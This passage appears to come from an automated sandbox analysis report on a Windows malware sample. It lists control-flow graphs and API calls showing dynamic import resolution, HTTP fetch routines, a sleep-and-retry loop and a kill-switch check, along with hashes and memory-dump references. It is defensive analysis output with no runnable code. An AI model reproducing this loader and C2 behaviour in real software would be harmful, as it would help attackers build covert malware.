                                          control_flow_graph 633 ea9c10-ea9c1a 634 ea9c20-eaa031 GetProcAddress * 43 633->634 635 eaa036-eaa0ca LoadLibraryA * 8 633->635 634->635 636 eaa0cc-eaa141 GetProcAddress * 5 635->636 637 eaa146-eaa14d 635->637 636->637 638 eaa153-eaa211 GetProcAddress * 8 637->638 639 eaa216-eaa21d 637->639 638->639 640 eaa298-eaa29f 639->640 641 eaa21f-eaa293 GetProcAddress * 5 639->641 642 eaa337-eaa33e 640->642 643 eaa2a5-eaa332 GetProcAddress * 6 640->643 641->640 644 eaa41f-eaa426 642->644 645 eaa344-eaa41a GetProcAddress * 9 642->645 643->642 646 eaa428-eaa49d GetProcAddress * 5 644->646 647 eaa4a2-eaa4a9 644->647 645->644 646->647 648 eaa4ab-eaa4d7 GetProcAddress * 2 647->648 649 eaa4dc-eaa4e3 647->649 648->649 650 eaa515-eaa51c 649->650 651 eaa4e5-eaa510 GetProcAddress * 2 649->651 652 eaa612-eaa619 650->652 653 eaa522-eaa60d GetProcAddress * 10 650->653 651->650 654 eaa61b-eaa678 GetProcAddress * 4 652->654 655 eaa67d-eaa684 652->655 653->652 654->655 656 eaa69e-eaa6a5 655->656 657 eaa686-eaa699 GetProcAddress 655->657 658 eaa708-eaa709 656->658 659 eaa6a7-eaa703 GetProcAddress * 4 656->659 657->656 659->658
                                          APIs
                                          • GetProcAddress.KERNEL32(76210000,00BA5328), ref: 00EA9C2D
                                          • GetProcAddress.KERNEL32(76210000,00BA52A8), ref: 00EA9C45
                                          • GetProcAddress.KERNEL32(76210000,00BB8FF8), ref: 00EA9C5E
                                          • GetProcAddress.KERNEL32(76210000,00BB8FC8), ref: 00EA9C76
                                          • GetProcAddress.KERNEL32(76210000,00BB9010), ref: 00EA9C8E
                                          • GetProcAddress.KERNEL32(76210000,00BBD820), ref: 00EA9CA7
                                          • GetProcAddress.KERNEL32(76210000,00BAA860), ref: 00EA9CBF
                                          • GetProcAddress.KERNEL32(76210000,00BBD8E0), ref: 00EA9CD7
                                          • GetProcAddress.KERNEL32(76210000,00BBD9B8), ref: 00EA9CF0
                                          • GetProcAddress.KERNEL32(76210000,00BBD928), ref: 00EA9D08
                                          • GetProcAddress.KERNEL32(76210000,00BBD7D8), ref: 00EA9D20
                                          • GetProcAddress.KERNEL32(76210000,00BA4FA8), ref: 00EA9D39
                                          • GetProcAddress.KERNEL32(76210000,00BA5048), ref: 00EA9D51
                                          • GetProcAddress.KERNEL32(76210000,00BA5168), ref: 00EA9D69
                                          • GetProcAddress.KERNEL32(76210000,00BA50A8), ref: 00EA9D82
                                          • GetProcAddress.KERNEL32(76210000,00BBDA60), ref: 00EA9D9A
                                          • GetProcAddress.KERNEL32(76210000,00BBD970), ref: 00EA9DB2
                                          • GetProcAddress.KERNEL32(76210000,00BAA450), ref: 00EA9DCB
                                          • GetProcAddress.KERNEL32(76210000,00BA51A8), ref: 00EA9DE3
                                          • GetProcAddress.KERNEL32(76210000,00BBD9A0), ref: 00EA9DFB
                                          • GetProcAddress.KERNEL32(76210000,00BBD850), ref: 00EA9E14
                                          • GetProcAddress.KERNEL32(76210000,00BBD940), ref: 00EA9E2C
                                          • GetProcAddress.KERNEL32(76210000,00BBD9D0), ref: 00EA9E44
                                          • GetProcAddress.KERNEL32(76210000,00BA5228), ref: 00EA9E5D
                                          • GetProcAddress.KERNEL32(76210000,00BBD910), ref: 00EA9E75
                                          • GetProcAddress.KERNEL32(76210000,00BBD958), ref: 00EA9E8D
                                          • GetProcAddress.KERNEL32(76210000,00BBD988), ref: 00EA9EA6
                                          • GetProcAddress.KERNEL32(76210000,00BBDA48), ref: 00EA9EBE
                                          • GetProcAddress.KERNEL32(76210000,00BBD9E8), ref: 00EA9ED6
                                          • GetProcAddress.KERNEL32(76210000,00BBDA00), ref: 00EA9EEF
                                          • GetProcAddress.KERNEL32(76210000,00BBD8F8), ref: 00EA9F07
                                          • GetProcAddress.KERNEL32(76210000,00BBD8C8), ref: 00EA9F1F
                                          • GetProcAddress.KERNEL32(76210000,00BBDA78), ref: 00EA9F38
                                          • GetProcAddress.KERNEL32(76210000,00BAFDA8), ref: 00EA9F50
                                          • GetProcAddress.KERNEL32(76210000,00BBD838), ref: 00EA9F68
                                          • GetProcAddress.KERNEL32(76210000,00BBDA18), ref: 00EA9F81
                                          • GetProcAddress.KERNEL32(76210000,00BA50E8), ref: 00EA9F99
                                          • GetProcAddress.KERNEL32(76210000,00BBDA30), ref: 00EA9FB1
                                          • GetProcAddress.KERNEL32(76210000,00BA4F48), ref: 00EA9FCA
                                          • GetProcAddress.KERNEL32(76210000,00BBD7C0), ref: 00EA9FE2
                                          • GetProcAddress.KERNEL32(76210000,00BBDA90), ref: 00EA9FFA
                                          • GetProcAddress.KERNEL32(76210000,00BA4FC8), ref: 00EAA013
                                          • GetProcAddress.KERNEL32(76210000,00BA51E8), ref: 00EAA02B
                                          • LoadLibraryA.KERNEL32(00BBD868,?,00EA5CA3,00EB0AEB,?,?,?,?,?,?,?,?,?,?,00EB0AEA,00EB0AE3), ref: 00EAA03D
                                          • LoadLibraryA.KERNEL32(00BBDAA8,?,00EA5CA3,00EB0AEB,?,?,?,?,?,?,?,?,?,?,00EB0AEA,00EB0AE3), ref: 00EAA04E
                                          • LoadLibraryA.KERNEL32(00BBD880,?,00EA5CA3,00EB0AEB,?,?,?,?,?,?,?,?,?,?,00EB0AEA,00EB0AE3), ref: 00EAA060
                                          • LoadLibraryA.KERNEL32(00BBD7F0,?,00EA5CA3,00EB0AEB,?,?,?,?,?,?,?,?,?,?,00EB0AEA,00EB0AE3), ref: 00EAA072
                                          • LoadLibraryA.KERNEL32(00BBD808,?,00EA5CA3,00EB0AEB,?,?,?,?,?,?,?,?,?,?,00EB0AEA,00EB0AE3), ref: 00EAA083
                                          • LoadLibraryA.KERNEL32(00BBD898,?,00EA5CA3,00EB0AEB,?,?,?,?,?,?,?,?,?,?,00EB0AEA,00EB0AE3), ref: 00EAA095
                                          • LoadLibraryA.KERNEL32(00BBD8B0,?,00EA5CA3,00EB0AEB,?,?,?,?,?,?,?,?,?,?,00EB0AEA,00EB0AE3), ref: 00EAA0A7
                                          • LoadLibraryA.KERNEL32(00BBDCA0,?,00EA5CA3,00EB0AEB,?,?,?,?,?,?,?,?,?,?,00EB0AEA,00EB0AE3), ref: 00EAA0B8
                                          • GetProcAddress.KERNEL32(751E0000,00BA50C8), ref: 00EAA0DA
                                          • GetProcAddress.KERNEL32(751E0000,00BBDCB8), ref: 00EAA0F2
                                          • GetProcAddress.KERNEL32(751E0000,00BB8C48), ref: 00EAA10A
                                          • GetProcAddress.KERNEL32(751E0000,00BBDB38), ref: 00EAA123
                                          • GetProcAddress.KERNEL32(751E0000,00BA5248), ref: 00EAA13B
                                          • GetProcAddress.KERNEL32(700F0000,00BAA5E0), ref: 00EAA160
                                          • GetProcAddress.KERNEL32(700F0000,00BA5348), ref: 00EAA179
                                          • GetProcAddress.KERNEL32(700F0000,00BAA608), ref: 00EAA191
                                          • GetProcAddress.KERNEL32(700F0000,00BBDC58), ref: 00EAA1A9
                                          • GetProcAddress.KERNEL32(700F0000,00BBDC70), ref: 00EAA1C2
                                          • GetProcAddress.KERNEL32(700F0000,00BA5528), ref: 00EAA1DA
                                          • GetProcAddress.KERNEL32(700F0000,00BA5388), ref: 00EAA1F2
                                          • GetProcAddress.KERNEL32(700F0000,00BBDCE8), ref: 00EAA20B
                                          • GetProcAddress.KERNEL32(753A0000,00BA5668), ref: 00EAA22C
                                          • GetProcAddress.KERNEL32(753A0000,00BA5548), ref: 00EAA244
                                          • GetProcAddress.KERNEL32(753A0000,00BBDB68), ref: 00EAA25D
                                          • GetProcAddress.KERNEL32(753A0000,00BBDB20), ref: 00EAA275
                                          • GetProcAddress.KERNEL32(753A0000,00BA54C8), ref: 00EAA28D
                                          • GetProcAddress.KERNEL32(76310000,00BAA8D8), ref: 00EAA2B3
                                          • GetProcAddress.KERNEL32(76310000,00BAA748), ref: 00EAA2CB
                                          • GetProcAddress.KERNEL32(76310000,00BBDDA8), ref: 00EAA2E3
                                          • GetProcAddress.KERNEL32(76310000,00BA56A8), ref: 00EAA2FC
                                          • GetProcAddress.KERNEL32(76310000,00BA5688), ref: 00EAA314
                                          • GetProcAddress.KERNEL32(76310000,00BAA680), ref: 00EAA32C
                                          • GetProcAddress.KERNEL32(76910000,00BBDD78), ref: 00EAA352
                                          • GetProcAddress.KERNEL32(76910000,00BA5448), ref: 00EAA36A
                                          • GetProcAddress.KERNEL32(76910000,00BB8BD8), ref: 00EAA382
                                          • GetProcAddress.KERNEL32(76910000,00BBDAD8), ref: 00EAA39B
                                          • GetProcAddress.KERNEL32(76910000,00BBDC88), ref: 00EAA3B3
                                          • GetProcAddress.KERNEL32(76910000,00BA56C8), ref: 00EAA3CB
                                          • GetProcAddress.KERNEL32(76910000,00BA54A8), ref: 00EAA3E4
                                          • GetProcAddress.KERNEL32(76910000,00BBDAF0), ref: 00EAA3FC
                                          • GetProcAddress.KERNEL32(76910000,00BBDB08), ref: 00EAA414
                                          • GetProcAddress.KERNEL32(75B30000,00BA5628), ref: 00EAA436
                                          • GetProcAddress.KERNEL32(75B30000,00BBDBC8), ref: 00EAA44E
                                          • GetProcAddress.KERNEL32(75B30000,00BBDB80), ref: 00EAA466
                                          • GetProcAddress.KERNEL32(75B30000,00BBDAC0), ref: 00EAA47F
                                          • GetProcAddress.KERNEL32(75B30000,00BBDB50), ref: 00EAA497
                                          • GetProcAddress.KERNEL32(75670000,00BA5468), ref: 00EAA4B8
                                          • GetProcAddress.KERNEL32(75670000,00BA56E8), ref: 00EAA4D1
                                          • GetProcAddress.KERNEL32(76AC0000,00BA5408), ref: 00EAA4F2
                                          • GetProcAddress.KERNEL32(76AC0000,00BBDD90), ref: 00EAA50A
                                          • GetProcAddress.KERNEL32(6F4E0000,00BA54E8), ref: 00EAA530
                                          • GetProcAddress.KERNEL32(6F4E0000,00BA5368), ref: 00EAA548
                                          • GetProcAddress.KERNEL32(6F4E0000,00BA53A8), ref: 00EAA560
                                          • GetProcAddress.KERNEL32(6F4E0000,00BBDB98), ref: 00EAA579
                                          • GetProcAddress.KERNEL32(6F4E0000,00BA53C8), ref: 00EAA591
                                          • GetProcAddress.KERNEL32(6F4E0000,00BA53E8), ref: 00EAA5A9
                                          • GetProcAddress.KERNEL32(6F4E0000,00BA5428), ref: 00EAA5C2
                                          • GetProcAddress.KERNEL32(6F4E0000,00BA5648), ref: 00EAA5DA
                                          • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 00EAA5F1
                                          • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 00EAA607
                                          • GetProcAddress.KERNEL32(75AE0000,00BBDBE0), ref: 00EAA629
                                          • GetProcAddress.KERNEL32(75AE0000,00BB8AC8), ref: 00EAA641
                                          • GetProcAddress.KERNEL32(75AE0000,00BBDBB0), ref: 00EAA659
                                          • GetProcAddress.KERNEL32(75AE0000,00BBDC28), ref: 00EAA672
                                          • GetProcAddress.KERNEL32(76300000,00BA5488), ref: 00EAA693
                                          • GetProcAddress.KERNEL32(6FE40000,00BBDBF8), ref: 00EAA6B4
                                          • GetProcAddress.KERNEL32(6FE40000,00BA5568), ref: 00EAA6CD
                                          • GetProcAddress.KERNEL32(6FE40000,00BBDCD0), ref: 00EAA6E5
                                          • GetProcAddress.KERNEL32(6FE40000,00BBDD00), ref: 00EAA6FD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: HttpQueryInfoA$InternetSetOptionA
                                          • API String ID: 2238633743-1775429166
                                          • Opcode ID: e5cc3428da31f3beb7b543f9ec5b5399ab09005dc6aabba309ed9de79c2aa0ac
                                          • Instruction ID: 1fdfcc2bd6c7ab058a4be5126a5b8bb3d3288981c5935ce40cca0e2ece980dc1
                                          • Opcode Fuzzy Hash: e5cc3428da31f3beb7b543f9ec5b5399ab09005dc6aabba309ed9de79c2aa0ac
                                          • Instruction Fuzzy Hash: 8B622BB5702241EFC764DFA8E98996637F9F78C201315855ABE8AC324CDB3F9541DB20
                                          Function 00E96280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1033 e96280-e9630b call eaa7a0 call e947b0 call eaa740 InternetOpenA StrCmpCA 1040 e9630d 1033->1040 1041 e96314-e96318 1033->1041 1040->1041 1042 e96509-e96525 call eaa7a0 call eaa800 * 2 1041->1042 1043 e9631e-e96342 InternetConnectA 1041->1043 1062 e96528-e9652d 1042->1062 1045 e96348-e9634c 1043->1045 1046 e964ff-e96503 InternetCloseHandle 1043->1046 1048 e9635a 1045->1048 1049 e9634e-e96358 1045->1049 1046->1042 1050 e96364-e96392 HttpOpenRequestA 1048->1050 1049->1050 1052 e96398-e9639c 1050->1052 1053 e964f5-e964f9 InternetCloseHandle 1050->1053 1055 e9639e-e963bf InternetSetOptionA 1052->1055 1056 e963c5-e96405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1046 1055->1056 1058 e9642c-e9644b call ea8940 1056->1058 1059 e96407-e96427 call eaa740 call eaa800 * 2 1056->1059 1067 e964c9-e964e9 call eaa740 call eaa800 * 2 1058->1067 1068 e9644d-e96454 1058->1068 1059->1062 1067->1062 1069 e964c7-e964ef InternetCloseHandle 1068->1069 1070 e96456-e96480 InternetReadFile 1068->1070 1069->1053 1073 e9648b 1070->1073 1074 e96482-e96489 1070->1074 1073->1069 1074->1073 1078 e9648d-e964c5 call eaa9b0 call eaa8a0 call eaa800 1074->1078 1078->1070
                                          APIs
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00E947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E94839
                                            • Part of subcall function 00E947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E94849
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          • InternetOpenA.WININET(00EB0DFE,00000001,00000000,00000000,00000000), ref: 00E962E1
                                          • StrCmpCA.SHLWAPI(?,00BBFCF0), ref: 00E96303
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E96335
                                          • HttpOpenRequestA.WININET(00000000,GET,?,00BBF278,00000000,00000000,00400100,00000000), ref: 00E96385
                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E963BF
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E963D1
                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00E963FD
                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E9646D
                                          • InternetCloseHandle.WININET(00000000), ref: 00E964EF
                                          • InternetCloseHandle.WININET(00000000), ref: 00E964F9
                                          • InternetCloseHandle.WININET(00000000), ref: 00E96503
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                          • String ID: ERROR$ERROR$GET
                                          • API String ID: 3749127164-2509457195
                                          • Opcode ID: 5b8ad47edbaa1bb09ec94ed43d464cbb54b754340800319e4d1bf97b434d16f6
                                          • Instruction ID: bf2fa369a91cef15860e924f3903c2e6533233c6a648635de72809cbc76b3168
                                          • Opcode Fuzzy Hash: 5b8ad47edbaa1bb09ec94ed43d464cbb54b754340800319e4d1bf97b434d16f6
                                          • Instruction Fuzzy Hash: 12713B71A00318EBDF24DBA0DC49BEE77B4BB48700F1091A9F50A7B184DBB96A85CF51
                                          Function 00EA5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1090 ea5510-ea5577 call ea5ad0 call eaa820 * 3 call eaa740 * 4 1106 ea557c-ea5583 1090->1106 1107 ea55d7-ea564c call eaa740 * 2 call e91590 call ea52c0 call eaa8a0 call eaa800 call eaaad0 StrCmpCA 1106->1107 1108 ea5585-ea55b6 call eaa820 call eaa7a0 call e91590 call ea51f0 1106->1108 1134 ea5693-ea56a9 call eaaad0 StrCmpCA 1107->1134 1138 ea564e-ea568e call eaa7a0 call e91590 call ea51f0 call eaa8a0 call eaa800 1107->1138 1124 ea55bb-ea55d2 call eaa8a0 call eaa800 1108->1124 1124->1134 1139 ea56af-ea56b6 1134->1139 1140 ea57dc-ea5844 call eaa8a0 call eaa820 * 2 call e91670 call eaa800 * 4 call ea6560 call e91550 1134->1140 1138->1134 1143 ea57da-ea585f call eaaad0 StrCmpCA 1139->1143 1144 ea56bc-ea56c3 1139->1144 1270 ea5ac3-ea5ac6 1140->1270 1163 ea5991-ea59f9 call eaa8a0 call eaa820 * 2 call e91670 call eaa800 * 4 call ea6560 call e91550 1143->1163 1164 ea5865-ea586c 1143->1164 1148 ea571e-ea5793 call eaa740 * 2 call e91590 call ea52c0 call eaa8a0 call eaa800 call eaaad0 StrCmpCA 1144->1148 1149 ea56c5-ea5719 call eaa820 call eaa7a0 call e91590 call ea51f0 call eaa8a0 call eaa800 1144->1149 1148->1143 1249 ea5795-ea57d5 call eaa7a0 call e91590 call ea51f0 call eaa8a0 call eaa800 1148->1249 1149->1143 1163->1270 1170 ea598f-ea5a14 call eaaad0 StrCmpCA 1164->1170 1171 ea5872-ea5879 1164->1171 1199 ea5a28-ea5a91 call eaa8a0 call eaa820 * 2 call e91670 call eaa800 * 4 call ea6560 call e91550 1170->1199 1200 ea5a16-ea5a21 Sleep 1170->1200 1178 ea587b-ea58ce call eaa820 call eaa7a0 call e91590 call ea51f0 call eaa8a0 call eaa800 1171->1178 1179 ea58d3-ea5948 call eaa740 * 2 call e91590 call ea52c0 call eaa8a0 call eaa800 call eaaad0 StrCmpCA 1171->1179 1178->1170 1179->1170 1275 ea594a-ea598a call eaa7a0 call e91590 call ea51f0 call eaa8a0 call eaa800 1179->1275 1199->1270 1200->1106 1249->1143 1275->1170
                                          APIs
                                            • Part of subcall function 00EAA820: lstrlen.KERNEL32(00E94F05,?,?,00E94F05,00EB0DDE), ref: 00EAA82B
                                            • Part of subcall function 00EAA820: lstrcpy.KERNEL32(00EB0DDE,00000000), ref: 00EAA885
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EA5644
                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EA56A1
                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EA5857
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00EA51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EA5228
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EA52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EA5318
                                            • Part of subcall function 00EA52C0: lstrlen.KERNEL32(00000000), ref: 00EA532F
                                            • Part of subcall function 00EA52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00EA5364
                                            • Part of subcall function 00EA52C0: lstrlen.KERNEL32(00000000), ref: 00EA5383
                                            • Part of subcall function 00EA52C0: lstrlen.KERNEL32(00000000), ref: 00EA53AE
                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EA578B
                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EA5940
                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EA5A0C
                                          • Sleep.KERNEL32(0000EA60), ref: 00EA5A1B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpylstrlen$Sleep
                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                          • API String ID: 507064821-2791005934
                                          • Opcode ID: d514c10238f277c2d9eb36fcd0c67bdda31fda32d2b3d1966cc3d05fc805f922
                                          • Instruction ID: 3cdbdf0de43e912afe9ebe545b68256d55af534f1f0a94a9174d5e107e36fa0e
                                          • Opcode Fuzzy Hash: d514c10238f277c2d9eb36fcd0c67bdda31fda32d2b3d1966cc3d05fc805f922
                                          • Instruction Fuzzy Hash: C3E155729102049BCB58FBA0DC56AFE73B8AF59300F549568B4077B095EF397B09CB92
                                          Function 00EA17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1301 ea17a0-ea17cd call eaaad0 StrCmpCA 1304 ea17cf-ea17d1 ExitProcess 1301->1304 1305 ea17d7-ea17f1 call eaaad0 1301->1305 1309 ea17f4-ea17f8 1305->1309 1310 ea17fe-ea1811 1309->1310 1311 ea19c2-ea19cd call eaa800 1309->1311 1313 ea199e-ea19bd 1310->1313 1314 ea1817-ea181a 1310->1314 1313->1309 1316 ea1849-ea1858 call eaa820 1314->1316 1317 ea18cf-ea18e0 StrCmpCA 1314->1317 1318 ea198f-ea1999 call eaa820 1314->1318 1319 ea18ad-ea18be StrCmpCA 1314->1319 1320 ea1821-ea1830 call eaa820 1314->1320 1321 ea187f-ea1890 StrCmpCA 1314->1321 1322 ea185d-ea186e StrCmpCA 1314->1322 1323 ea1932-ea1943 StrCmpCA 1314->1323 1324 ea1913-ea1924 StrCmpCA 1314->1324 1325 ea1970-ea1981 StrCmpCA 1314->1325 1326 ea18f1-ea1902 StrCmpCA 1314->1326 1327 ea1951-ea1962 StrCmpCA 1314->1327 1328 ea1835-ea1844 call eaa820 1314->1328 1316->1313 1329 ea18ec 1317->1329 1330 ea18e2-ea18e5 1317->1330 1318->1313 1350 ea18ca 1319->1350 1351 ea18c0-ea18c3 1319->1351 1320->1313 1348 ea189e-ea18a1 1321->1348 1349 ea1892-ea189c 1321->1349 1346 ea187a 1322->1346 1347 ea1870-ea1873 1322->1347 1335 ea194f 1323->1335 1336 ea1945-ea1948 1323->1336 1333 ea1930 1324->1333 1334 ea1926-ea1929 1324->1334 1340 ea198d 1325->1340 1341 ea1983-ea1986 1325->1341 1331 ea190e 1326->1331 1332 ea1904-ea1907 1326->1332 1337 ea196e 1327->1337 1338 ea1964-ea1967 1327->1338 1328->1313 1329->1313 1330->1329 1331->1313 1332->1331 1333->1313 1334->1333 1335->1313 1336->1335 1337->1313 1338->1337 1340->1313 1341->1340 1346->1313 1347->1346 1355 ea18a8 1348->1355 1349->1355 1350->1313 1351->1350 1355->1313
                                          APIs
                                          • StrCmpCA.SHLWAPI(00000000,block), ref: 00EA17C5
                                          • ExitProcess.KERNEL32 ref: 00EA17D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
